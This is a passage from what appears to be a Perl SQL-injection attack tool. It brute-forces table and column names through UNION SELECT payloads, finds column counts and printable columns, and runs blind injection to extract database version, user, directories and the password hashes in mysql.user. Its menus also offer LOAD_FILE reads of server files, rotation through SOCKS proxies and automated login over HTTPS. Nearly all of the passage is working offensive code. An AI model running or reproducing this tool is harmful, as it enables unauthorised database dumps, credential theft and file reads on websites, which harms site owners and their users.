  1303.                     $content = scan_url_HEADER();
  1304.                }  
  1305.                if ($content =~ m/ussr(.*?)ussr/img) {
  1306.                     print "   " . $1 . "\n";
  1307.                     print FILE "  "  . $1 . "\n";
  1308.                }
  1309.                print $num . "\r";
  1310.                sleep $pause;
  1311.  
  1312.             }
  1313.          }
  1314.          print "----------\n";
  1315.          print "Saved in " . "z_" . $host . ".txt\n";
  1316.          close(FILE);
  1317.          goto START;
  1318.     }
  1319. }
  1320. if ($choice == 8) {
  1321.    START1:
  1322.  
  1323.    print "    [1] Brute table\n";
  1324.    print "    [2] Brute column\n";
  1325.    print "    [3] Main menu\n";
  1326.    print "----------\n";
  1327.    $choice = <STDIN>;
  1328.    chomp $choice;
  1329.    print "Your choice: $choice\n";
  1330.    $url19 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,version())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  1331.    print "Check version(): ";
  1332.    $current = $url19;
  1333.    $content = scan_url();
  1334.    $ver = $content;
  1335.    $ver =~ m/ussr(.*?)ussr/img;
  1336.    $ver = $1;
  1337.    if ($ver) {
  1338.          print " $ver \n";
  1339.    } else {
  1340.          print " Can't get data \n";
  1341.          goto START1;
  1342.    }
  1343.    print "-------------\n";
  1344.    if ($choice == 1) {
  1345.        open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  1346.        print "   Brute tables\n";
  1347.        print "   -------------\n";
  1348.        print FILE1 "   Brute tables\n";
  1349.        print FILE1 "   -------------\n";
  1350.        open(FILE, "<", $source_table_list);
  1351.        while(<FILE>) {
  1352.          chomp;
  1353.          push(@tables4, $_);
  1354.        }
  1355.        close(FILE);
  1356.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
  1357.        $choice = <STDIN>;
  1358.        chomp $choice;
  1359.        if ($choice == 1) {
  1360.               print "Enter your prefix for brute tables: ";
  1361.               $choice = <STDIN>;
  1362.               chomp $choice;
  1363.               $pref_brute = $choice;
  1364.        } else {
  1365.               $pref_brute = "";
  1366.        }
  1367.        $size = 0;
  1368.        $size = @tables4;
  1369.        print "File: $source_table_list\n";
  1370.        print "Tables: $size\n";
  1371.        print "-------------\n";
  1372.        print "Request method - $method\n";
  1373.        print "Threads - $kol_threads\n";
  1374.        print "Proxy - $proxy_message\n";
  1375.        print "----------------------\n";
  1376.        $thr = $kol_threads; # ???-?? ???????
  1377.        $num = -1; # ?? ????????
  1378.        for(0..$thr) {
  1379.             $trl[$_] = threads->create(\&gets6);
  1380.        }
  1381.        for(0..$thr) {
  1382.             $trl[$_]->join;
  1383.        }
  1384.        sub gets6 {
  1385.             $| = 1;
  1386.             while ($num<$size) {
  1387.                { lock($num);
  1388.                $num++; }
  1389.                $current1 = $pref_brute . $tables4[$num];
  1390.                $url25 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $num . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $current1 . $limit . $filtr;
  1391.                $current = $url25;
  1392.                $content = scan_url();
  1393.                if ($content =~ m/ussr(.*?)ussr/img) {
  1394.                     print "   ---> " . $current1 . "\n";
  1395.                     print FILE1 "  "  . $current1 . "\n";
  1396.                }
  1397.                print $num . "\r";
  1398.                sleep $pause;
  1399.  
  1400.             }
  1401.        }
  1402.        print "----------\n";
  1403.        print "Saved in " . "z_" . $host . ".txt\n";
  1404.        close(FILE1);
  1405.        goto START1;
  1406.    }
  1407.    if ($choice == 2) {
  1408.          open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  1409.          print "   Brute columns\n";
  1410.          print "   -------------\n";
  1411.          print FILE1 "   Brute columns\n";
  1412.          print FILE1 "   -------------\n";
  1413.          print "Enter the table_name for brute: \n";
  1414.          $choice = <STDIN>;
  1415.          chomp $choice;
  1416.          if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  1417.          $table = $choice;
  1418.          print "Brute columns for table [ " . $table . " ]\n";
  1419.          print "-------------\n";
  1420.          print "   Check table exist: ";
  1421.          $url20 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,$table)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  1422.          $current = $url20;
  1423.          $content = scan_url();
  1424.          $ver =$content;
  1425.          $ver =~ m/ussr(.*?)ussr/img;
  1426.          $ver = $1;
  1427.          if ($ver) {
  1428.              print " Ok \n";
  1429.          } else {
  1430.              print " No such table... \n";
  1431.              goto START1;
  1432.          }
  1433.          open(FILE, "<", $source_column_list);
  1434.          while(<FILE>) {
  1435.             chomp;
  1436.             push(@columns4, $_);
  1437.          }
  1438.          close(FILE);
  1439.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
  1440.        $choice = <STDIN>;
  1441.        chomp $choice;
  1442.        if ($choice == 1) {
  1443.               print "Enter your prefix for brute columns: ";
  1444.               $choice = <STDIN>;
  1445.               chomp $choice;
  1446.               $pref_brute = $choice;
  1447.        } else {
  1448.               $pref_brute = "";
  1449.        }
  1450.          $size = 0;
  1451.          $size = @columns4;
  1452.          print "-------------\n";
  1453.          print "File: $source_column_list\n";
  1454.          print "Columns: $size\n";
  1455.          print "-------------\n";
  1456.          print "Request method - $method\n";
  1457.          print "Threads - $kol_threads\n";
  1458.          print "Proxy - $proxy_message\n";
  1459.          print "----------------------\n";
  1460.          $thr = $kol_threads; # ???-?? ???????
  1461.        $num = -1; # ?? ????????
  1462.        for(0..$thr) {
  1463.             $trl[$_] = threads->create(\&gets7);
  1464.        }
  1465.        for(0..$thr) {
  1466.             $trl[$_]->join;
  1467.        }
  1468.        sub gets7 {
  1469.             $| = 1;
  1470.             while ($num<$size) {
  1471.                { lock($num);
  1472.                $num++; }
  1473.                $current1 = $pref_brute . $columns4[$num];
  1474.                $url26 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $current1 . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table . $limit . $filtr;
  1475.                $current = $url26;
  1476.                $content = scan_url();
  1477.                if ($content =~ m/ussr(.*?)ussr/img) {
  1478.                     print "   ---> " . $current1 . "\n";
  1479.                     print FILE1 "  "  . $current1 . "\n";
  1480.                }
  1481.                print $num . "\r";
  1482.                sleep $pause;
  1483.  
  1484.             }
  1485.        }
  1486.        print "----------\n";
  1487.        print "Saved in " . "z_" . $host . ".txt\n";
  1488.        close(FILE1);
  1489.        goto START1;
  1490.    }
  1491.    if ($choice == 3) {
  1492.        goto START_global;
  1493.    }
  1494. }
  1495. if ($choice == 9) {
  1496.   if ($source_sql_c =~ m/^https:\/\/?([^\/]+)/i) {
  1497.      $host5 = $1;
  1498.      $https_flag = 1;
  1499.      print "----------------------\n";
  1500.      print "HTTPS mode enabled\n";
  1501.      print "----------------------\n";
  1502.   }
  1503.   $host = $host5;
  1504. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  1505.     print "-----------------------------------------\n";
  1506.     print "Authorization required, wait please....";
  1507.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  1508.     $ck1 = collect($answ1);
  1509.     $https_auth_check = 1;
  1510.     print " DONE\n";
  1511.     print "-----------------------------------------\n";
  1512. }
  1513.   if ($use_socks == 1 && $socks_check == 0) {
  1514.   $check_url = $host;
  1515.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  1516.            . "Host: $check_host\r\n"
  1517.            . "Referer: http://" . $check_url . "\r\n"
  1518.            . "Accept: */*\r\n"
  1519.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  1520.            . "Connection: close\r\n\r\n";
  1521.    print "----------------------------------------\n";
  1522.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  1523.    print "Timeout = 5 sec:\n";
  1524.    print "----------------------------------------\n";
  1525.    $socks_check = 0;
  1526.    $check_socks = socks_check();
  1527.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  1528.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  1529.   if ($current_proxy_host) {
  1530.      $socks_check = 1;
  1531.      print "Will use --> $proxy_message\n";
  1532.   } else {
  1533.      $socks_check = 0;
  1534.      $proxy_message = "No";
  1535.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  1536.   }
  1537. }
  1538.   open( FILE1, ">>" . "z_" . $host5. ".txt"); # ???? ??? ?????? ???????????
  1539.   if ($sql_mess_type == 0) {
  1540.       $mess_type = "When wrong";
  1541.   } else {
  1542.       $mess_type = "When right";
  1543.  
  1544.   }
  1545.   ## ?????????? ?????? ???????? ??????? ??? ?????? ##
  1546.   print "Threads - $kol_threads\n";
  1547.   print "Method - $method\n";
  1548.   print "Mysql inj URL - ". $source_sql_c . $plus_c . "union" . $plus_c . "select...." . $filtr_c .   "\n";
  1549.   print "Message - [" . $sql_mess .  "]\n";
  1550.   print "Message type - [" . $mess_type .  "]\n";
  1551.   print "--------------------------------------\n";
  1552.   print "Check first 20 columns - no limit\n";
  1553.   print "--------------------------------------\n";
  1554.  
  1555.   $current_column_start = 1;
  1556.   $current_column_number = 20;
  1557.   $current_column_limit = "";
  1558.               %aa = ();
  1559.               $c_number = 0;
  1560.               $good_url = "";
  1561.               $aa = gets5000();
  1562.               $data1 = "";
  1563.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1564.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1565.               if ($good_url) {
  1566.                   print "---------------------------\n";
  1567.                   print "Column number = " . $c_number . "\n";
  1568.                   print "URL - " . $good_url . "\n";
  1569.                   print FILE1 "------------------\n";
  1570.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1571.                   print FILE1 "------------------\n";
  1572.                   print FILE1 $good_url . "\n";
  1573.                   goto PRINTABLE_COLUMN;
  1574.               }
  1575.   #############################################################
  1576.  ## ?????????? ?????? ???????? ??????? limit+0,1 ##
  1577.   print "--------------------------------------\n";
  1578.   print "Check first 20 columns - limit" . $plus_c . "0,1\n";
  1579.   print "--------------------------------------\n";
  1580.  
  1581.   $current_column_start = 1;
  1582.   $current_column_number = 20;
  1583.   $current_column_limit = "0,1";
  1584.               %aa = ();
  1585.               $c_number = 0;
  1586.               $good_url = "";
  1587.               $aa = gets5000();
  1588.               $data1 = "";
  1589.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1590.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1591.               if ($good_url) {
  1592.                   print "---------------------------\n";
  1593.                   print "Column number = " . $c_number . "\n";
  1594.                   print "URL - " . $good_url . "\n";
  1595.                   print FILE1 "------------------\n";
  1596.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1597.                   print FILE1 "------------------\n";
  1598.                   print FILE1 $good_url . "\n";
  1599.                   goto PRINTABLE_COLUMN;
  1600.               }
  1601.   #############################################################
  1602.   ## ?????????? ?????? ???????? ??????? limit+1,1 ##
  1603.   print "--------------------------------------\n";
  1604.   print "Check first 20 columns - limit" . $plus_c . "1,1\n";
  1605.   print "--------------------------------------\n";
  1606.  
  1607.   $current_column_start = 1;
  1608.   $current_column_number = 20;
  1609.   $current_column_limit = "1,1";
  1610.               %aa = ();
  1611.               $c_number = 0;
  1612.               $good_url = "";
  1613.               $aa = gets5000();
  1614.               $data1 = "";
  1615.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1616.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1617.               if ($good_url) {
  1618.                   print "---------------------------\n";
  1619.                   print "Column number = " . $c_number . "\n";
  1620.                   print "URL - " . $good_url . "\n";
  1621.                   print FILE1 "------------------\n";
  1622.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1623.                   print FILE1 "------------------\n";
  1624.                   print FILE1 $good_url . "\n";
  1625.                   goto PRINTABLE_COLUMN;
  1626.               }
  1627.   #################################################################
  1628.   ## ?????????? ??????? ? 21 ?? sql_max_column_number ??? ?????? ##
  1629.   print "--------------------------------------\n";
  1630.   print "Check columns from 21 to $sql_max_column_number - no limit\n";
  1631.   print "--------------------------------------\n";
  1632.  
  1633.   $current_column_start = 21;
  1634.   $current_column_number = $sql_max_column_number;
  1635.   $current_column_limit = "";
  1636.               %aa = ();
  1637.               $c_number = 0;
  1638.               $good_url = "";
  1639.               $aa = gets5000();
  1640.               $data1 = "";
  1641.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1642.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1643.               if ($good_url) {
  1644.                   print "---------------------------\n";
  1645.                   print "Column number = " . $c_number . "\n";
  1646.                   print "URL - " . $good_url . "\n";
  1647.                   print FILE1 "------------------\n";
  1648.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1649.                   print FILE1 "------------------\n";
  1650.                   print FILE1 $good_url . "\n";
  1651.                   goto PRINTABLE_COLUMN;
  1652.               }
  1653.   ################################################################
  1654.   ## ?????????? ??????? ? 21 ?? sql_max_column_number limit+0,1 ##
  1655.   print "--------------------------------------\n";
  1656.   print "Check columns from 21 to $sql_max_column_number  - limit" . $plus_c . "0,1\n";
  1657.   print "--------------------------------------\n";
  1658.  
  1659.   $current_column_start = 21;
  1660.   $current_column_number = $sql_max_column_number;
  1661.   $current_column_limit = "0,1";
  1662.               %aa = ();
  1663.               $c_number = 0;
  1664.               $good_url = "";
  1665.               $aa = gets5000();
  1666.               $data1 = "";
  1667.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1668.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1669.               if ($good_url) {
  1670.                   print "---------------------------\n";
  1671.                   print "Column number = " . $c_number . "\n";
  1672.                   print "URL - " . $good_url . "\n";
  1673.                   print FILE1 "------------------\n";
  1674.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1675.                   print FILE1 "------------------\n";
  1676.                   print FILE1 $good_url . "\n";
  1677.                   goto PRINTABLE_COLUMN;
  1678.               }
  1679.   ################################################################
  1680.   ## ?????????? ??????? ? 21 ?? sql_max_column_number limit+1,1 ##
  1681.   print "--------------------------------------\n";
  1682.   print "Check columns from 21 to $sql_max_column_number  - limit" . $plus_c . "1,1\n";
  1683.   print "--------------------------------------\n";
  1684.  
  1685.   $current_column_start = 21;
  1686.   $current_column_number = $sql_max_column_number;
  1687.   $current_column_limit = "1,1";
  1688.               %aa = ();
  1689.               $c_number = 0;
  1690.               $good_url = "";
  1691.               $aa = gets5000();
  1692.               $data1 = "";
  1693.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1694.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1695.               if ($good_url) {
  1696.                   print "---------------------------\n";
  1697.                   print "Column number = " . $c_number . "\n";
  1698.                   print "URL - " . $good_url . "\n";
  1699.                   print FILE1 "------------------\n";
  1700.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1701.                   print FILE1 "------------------\n";
  1702.                   print FILE1 $good_url . "\n";
  1703.                   goto PRINTABLE_COLUMN;
  1704.               }
  1705.   #############################################################
  1706.   sub gets5000 {
  1707.                    $ii = 0;
  1708.                    $i = $current_column_start;
  1709.                    $union = "";
  1710.                    $size = 0;
  1711.                    while($i <= $current_column_number) {
  1712.                     if ($current_column_start < 21) {
  1713.                       if($i == 1) {
  1714.                          $union=$i;
  1715.                       } else {
  1716.                          $union = $union . "," . $i;
  1717.                       }
  1718.                     } else {
  1719.                          if($current_column_start == 21) {
  1720.                              $union = $union . "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21";
  1721.                              $current_column_start = 0;
  1722.                          } else {
  1723.                              $union = $union . "," . $i;
  1724.                          }
  1725.                     }
  1726.                       if ($current_column_limit) {
  1727.                         $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $plus_c . "limit" . $plus_c . $current_column_limit . $filtr_c;
  1728.                       } else {
  1729.                         $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $filtr_c;
  1730.                       }
  1731.                       push(@columns_brute, $current11);
  1732.                       push(@columns_brute_n, $i);
  1733.                       $i++;
  1734.                    }
  1735.                    $size = @columns_brute;
  1736.                    %res = ();
  1737.                    $thr502 = $kol_threads; # ???-?? ???????
  1738.                    $num = -1; # ?? ????????
  1739.                    for(0..$thr502) {
  1740.                       $thr502[$_] = threads->create(\&gets502);
  1741.                    }
  1742.                    for(0..$thr502) {
  1743.                       %res = (%res, %{$thr502[$_]->join});
  1744.                    }
  1745.                    sub gets502 {
  1746.                             $| = 1;
  1747.                             %hash = ();
  1748.                             while ($num < $size) {
  1749.                                   { lock($num);
  1750.                                   $num++; }
  1751.                                   $ii = $num;
  1752.                                   if ($ii < $size) {
  1753.                                      $current10 = $columns_brute[$num];
  1754.                                      $nom = $columns_brute_n[$num];
  1755.                                      $column_brute_flag = column_check();
  1756.                                      if ($column_brute_flag == 1) {
  1757.                                          $hash{$ii} = $current10 . "||" . $nom;
  1758.                                          $ii = $size;
  1759.                                          break;
  1760.                                          return \%hash;
  1761.                                      }
  1762.                                   }
  1763.                                   print $num . "\r";
  1764.                                   sleep $pause;
  1765.                             }
  1766.                    }
  1767.                    return \%res;
  1768.             }
  1769.  print "----------\n";
  1770.  print "Can't find column number...\n";
  1771.  close(FILE1);
  1772.  goto START;
  1773.  #################################################################
  1774.  PRINTABLE_COLUMN:
  1775.   print "--------------------------------------\n";
  1776.   print "Searching printable column - no limit\n";
  1777.   print "--------------------------------------\n";
  1778.   if (!$current_column_limit) {
  1779.         $current_column_limit= "";
  1780.   } else {
  1781.       if ($current_column_limit == "0,1") {goto LIMIT0;}
  1782.       if ($current_column_limit == "1,1") {goto LIMIT1;}
  1783.   }
  1784.               %aa = ();
  1785.               $print_col = 0;
  1786.               $good_url = "";
  1787.               $aa = gets6000();
  1788.               $data1 = "";
  1789.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1790.               ($print_col,$good_url) = split(/\|\|/,$data1);
  1791.               if ($print_col) {
  1792.                   print "---------------------------\n";
  1793.                   print "Printable column = " . $print_col . "\n";
  1794.                   print "Right url - " . $good_url . "\n";
  1795.                   print FILE1 "------------------\n";
  1796.                   print FILE1 "Printable column:" . $print_col . "\n";
  1797.                   print FILE1 "------------------\n";
  1798.                   print FILE1 $good_url . "\n";
  1799.                   print "----------\n";
  1800.                   print "Saved in " . "z_" . $host5. ".txt\n";
  1801.                   close(FILE1);
  1802.                   goto START;
  1803.               }
  1804.   #############################################################
  1805.   LIMIT0:
  1806.   print "--------------------------------------\n";
  1807.   print "Searching printable column - limit" . $plus_c . "0,1\n";
  1808.   print "--------------------------------------\n";
  1809.   $current_column_limit = "0,1";
  1810.               %aa = ();
  1811.               $print_col = 0;
  1812.               $good_url = "";
  1813.               $aa = gets6000();
  1814.               $data1 = "";
  1815.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1816.               ($print_col,$good_url) = split(/\|\|/,$data1);
  1817.               if ($print_col) {
  1818.                   print "---------------------------\n";
  1819.                   print "Printable column = " . $print_col . "\n";
  1820.                   print "Right url - " . $good_url . "\n";
  1821.                   print FILE1 "------------------\n";
  1822.                   print FILE1 "Printable column:" . $print_col . "\n";
  1823.                   print FILE1 "------------------\n";
  1824.                   print FILE1 $good_url . "\n";
  1825.                   print "----------\n";
  1826.                   print "Saved in " . "z_" . $host5. ".txt\n";
  1827.                   close(FILE1);
  1828.                   goto START;
  1829.               }
  1830.   #############################################################
  1831.   LIMIT1:
  1832.   print "--------------------------------------\n";
  1833.   print "Searching printable column - limit" . $plus_c . "1,1\n";
  1834.   print "--------------------------------------\n";
  1835.   $current_column_limit = "1,1";
  1836.               %aa = ();
  1837.               $print_col = 0;
  1838.               $good_url = "";
  1839.               $aa = gets6000();
  1840.               $data1 = "";
  1841.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1842.               ($print_col,$good_url) = split(/\|\|/,$data1);
  1843.               if ($print_col) {
  1844.                   print "---------------------------\n";
  1845.                   print "Printable column = " . $print_col . "\n";
  1846.                   print "Right url - " . $good_url . "\n";
  1847.                   print FILE1 "------------------\n";
  1848.                   print FILE1 "Printable column:" . $print_col . "\n";
  1849.                   print FILE1 "------------------\n";
  1850.                   print FILE1 $good_url . "\n";
  1851.                   print "----------\n";
  1852.                   print "Saved in " . "z_" . $host5. ".txt\n";
  1853.                   close(FILE1);
  1854.                   goto START;
  1855.               }
  1856.  #############################################################
  1857.  sub gets6000 {
  1858.       $union = "";
  1859.       $current = "";
  1860.       $host = $host5;
  1861.       for($i=1; $i <= $c_number; $i++) {
  1862.          for($j=1; $j <= $c_number; $j++) {
  1863.            $temp = $sql_pref1 . $i . $sql_pref2;
  1864.            if($j==1){if($j==$i){$union=$temp}else{$union=$j}}
  1865.            elsif($j==$i){$union=$union.",".$temp}
  1866.            else{$union=$union.",".$j;}
  1867.          }
  1868.          if ($current_column_limit) {
  1869.             $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $plus_c . "limit" . $plus_c . $current_column_limit . $filtr_c;
  1870.          } else {
  1871.             $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $filtr_c;
  1872.          }
  1873.          push(@columns_print, $current11);
  1874.          push(@columns_print_n, $i);
  1875.       }
  1876.       $size = @columns_print;
  1877.       %res = ();
  1878.       $thr509 = $kol_threads; # ???-?? ???????
  1879.       $num = -1; # ?? ????????
  1880.       $ii = 0;
  1881.       for(0..$thr509) {
  1882.           $thr509[$_] = threads->create(\&gets509);
  1883.       }
  1884.       for(0..$thr509) {
  1885.           %res = (%res, %{$thr509[$_]->join});
  1886.       }
  1887.       sub gets509 {
  1888.               $| = 1;
  1889.               %hash = ();
  1890.               while ($num < $size) {
  1891.                     { lock($num);
  1892.                     $num++; }
  1893.                     $ii = $num;
  1894.                     $current = $columns_print[$num];
  1895.                     $nom = $columns_print_n[$num];
  1896.                     if ($ii < $size) {
  1897.                        $content = scan_url();
  1898.                        if ($content =~ m/ussr(.*?)ussr/img) {
  1899.                               $hash{$ii} = $nom . "||" . $current;
  1900.                               $ii = $size;
  1901.                               break;
  1902.                               return \%hash;
  1903.                        }
  1904.                     }
  1905.                     print $num . "\r";
  1906.                     sleep $pause;
  1907.               }
  1908.       }
  1909.       return \%res;
  1910.  }
  1911.  print "----------\n";
  1912.  print "Can't find printable column...\n";
  1913.  close(FILE1);
  1914.  goto START;
  1915. }
  1916. ## Mysql blind ##
  1917. if ($choice == 10) {
  1918. if ($bl_url =~ m/^https:\/\/?([^\/]+)/i) {
  1919.    $host3 = $1;
  1920.    $https_flag = 1;
  1921.    print "----------------------\n";
  1922.    print "HTTPS mode enabled\n";
  1923.    print "----------------------\n";
  1924. }
  1925. $host = $host3;
  1926. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  1927.     print "-----------------------------------------\n";
  1928.     print "Authorization required, wait please....";
  1929.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  1930.     $ck1 = collect($answ1);
  1931.     $https_auth_check = 1;
  1932.     print " DONE\n";
  1933.     print "-----------------------------------------\n";
  1934. }
  1935.    print $host . "\n";
  1936. if ($use_socks == 1 && $socks_check == 0) {
  1937.   $check_url = $host;
  1938.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  1939.            . "Host: $check_host\r\n"
  1940.            . "Referer: http://" . $check_url . "\r\n"
  1941.            . "Accept: */*\r\n"
  1942.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  1943.            . "Connection: close\r\n\r\n";
  1944.    print "----------------------------------------\n";
  1945.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  1946.    print "Timeout = 5 sec:\n";
  1947.    print "----------------------------------------\n";
  1948.    $socks_check = 0;
  1949.    $check_socks = socks_check();
  1950.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  1951.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  1952.   if ($current_proxy_host) {
  1953.      $socks_check = 1;
  1954.      print "Will use --> $proxy_message\n";
  1955.   } else {
  1956.      $socks_check = 0;
  1957.      $proxy_message = "No";
  1958.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  1959.   }
  1960. }
  1961.    START10:
  1962.    $schema_flag = 0;
  1963.    print "-----------------------------------------\n";
  1964.    print "Choose mode:\n";
  1965.    print "----------\n";
  1966.    print "    [1]  Blind System information\n";
  1967.    print "    [2]  Blind inj get DB-names from information_schema.schemata\n";
  1968.    print "    [3]  Blind inj get tables from DB-name\n";
  1969.    print "    [4]  <<< Blind ANY QUERY >>>\n";
  1970.    print "    [5]  Blind inj get column_name from tables from DB-name\n";
  1971.    print "    [6]  Blind inj get LOAD_FILE (file_priv = Y)\n";
  1972.    print "    [7]  Blind BRUTE LOAD_FILE log/conf files (file_priv = Y)\n";
  1973.    print "    [8]  Blind Get tables from information_schema (current DB)\n";
  1974.    print "    [9]  Blind Get column_name from table (current DB)\n";
  1975.    print "    [10] Blind Get data from columns\n";
  1976.    print "    [11] Blind Brute MySql4 for tables & columns\n";
  1977.    print "    [12] Main menu\n";
  1978.    print "----------\n";
  1979.    $choice = <STDIN>;
  1980.    chomp $choice;
  1981.    print "Your choice: $choice\n";
  1982.    if ($choice==1) {
  1983.    open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  1984.    print FILE1 "----------------------------------\n";
  1985.    print FILE1 "Blind MYsql system information:\n";
  1986.    print FILE1 "----------------------------------\n";
  1987.    # ?????? ?????? #
  1988.    $url1 = "version()";
  1989.    # ?????? ??? ???? #
  1990.    $url2 = "database()";
  1991.    # ?????? ????? #
  1992.    $url3 = "user()";
  1993.    # ?????? @@basedir #
  1994.    $url4 = "@@" . "basedir";
  1995.    # ?????? @@datadir #
  1996.    $url5 = "@@" . "datadir";
  1997.    # ?????? @@tmpdir #
  1998.    $url6 = "@@" . "tmpdir";
  1999.    # ?????? @@version_compile_os #
  2000.    $url7 = "@@" . "version_compile_os";
  2001.    # ?????? mysql.user #
  2002.    $url8 = "user" . $bl_plus . "from" . $bl_plus . "mysql.user";
  2003.    # ?????? mysql.password #
  2004.    $url9 = "password" . $bl_plus . "from" . $bl_plus . "mysql.user";
  2005.    # ?????? file_priv #
  2006.    $url10 = "file_priv" . $bl_plus ."from" . $bl_plus . "mysql.user" . $bl_plus . "where" . $bl_plus . "user=user";
  2007.    ####################
  2008.    $thr = $kol_threads; # ???-?? ???????
  2009.    $num = -1; # ?? ????????
  2010.    $bl_lenght = "";
  2011.    $ii = 0;
  2012.    $mflag = 0;
  2013.    print "-----------------------------------\n";
  2014.    print "Request method - $method\n";
  2015.    print "Threads - $kol_threads\n";
  2016.    print "Proxy - $proxy_message\n";
  2017.    print "----------------------\n";
  2018.    $time = localtime;
  2019.    print $time . "\n";
  2020.    print "-----------------------------------\n";
  2021.    @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url0);
  2022.    $size = @array; #???????? ?????? ???????
  2023.    for(0..$thr) {
  2024.          $trl[$_] = threads->create(\&gets101);
  2025.    }
  2026.    for(0..$thr) {
  2027.          $trl[$_]->join;
  2028.    }
  2029.    sub gets101 {
  2030.         $| = 1;
  2031.         while ($num < $size) {
  2032.             { lock($num);
  2033.             $num++; }
  2034.             $bl_current = $array[$num];
  2035.             if ($bl_mode==0) {
  2036.                    $bl_lenght = len_check();
  2037.             } else {
  2038.                    $bl_lenght = len_check1();
  2039.             }
  2040.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2041.                  print $bl_current . " [length]:" .  $bl_lenght . "\n";
  2042.                 if ($mflag == 1) {
  2043.                      ############################################################
  2044.                      %aa = ();
  2045.                      $aa = gets1000();
  2046.                      $data1 = "";
  2047.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2048.                      #############################################################
  2049.                  } else {
  2050.                    $data1 = "";
  2051.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2052.                     if ($bl_mode==0) {
  2053.                          $data1 .= chr(get_res_normal());
  2054.                     } else {
  2055.                          $data1 .= chr(get_res_normal1());
  2056.                     }
  2057.                       print $data1 . "\r";
  2058.                    }
  2059.                  }
  2060.                  print "\n------------------------------------------------------\n";
  2061.                  print "---> " . $bl_current . ": " . $data1 . "\n";
  2062.                  print "------------------------------------------------------\n";
  2063.                  print FILE1 $bl_current . ": " . $data1 . "\n";
  2064.             }
  2065.             $oo++;
  2066.             sleep $pause;
  2067.         }
  2068.    }
  2069.    $time = localtime;
  2070.    print "\n" . $time . "\n";
  2071.      print "----------\n";
  2072.      print "Saved in " . "z_" . $host3 . ".txt\n";
  2073.      close(FILE1);
  2074.      goto START10;
  2075. }
  2076. # Blind db names
  2077. if ($choice==2) {
  2078.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2079.      print "-----------------------------------\n";
  2080.      ## ???????? ##
  2081.      $bl_lenght = "";
  2082.      $ii = 0;
  2083.      $bl_current = "(select" . $bl_plus .  "count(schema_name)" . $bl_plus . "from" . $bl_plus . "information_schema.schemata)";
  2084.      if ($bl_mode==0) {
  2085.             $bl_lenght = len_check();
  2086.      } else {
  2087.             $bl_lenght = len_check1();
  2088.      }
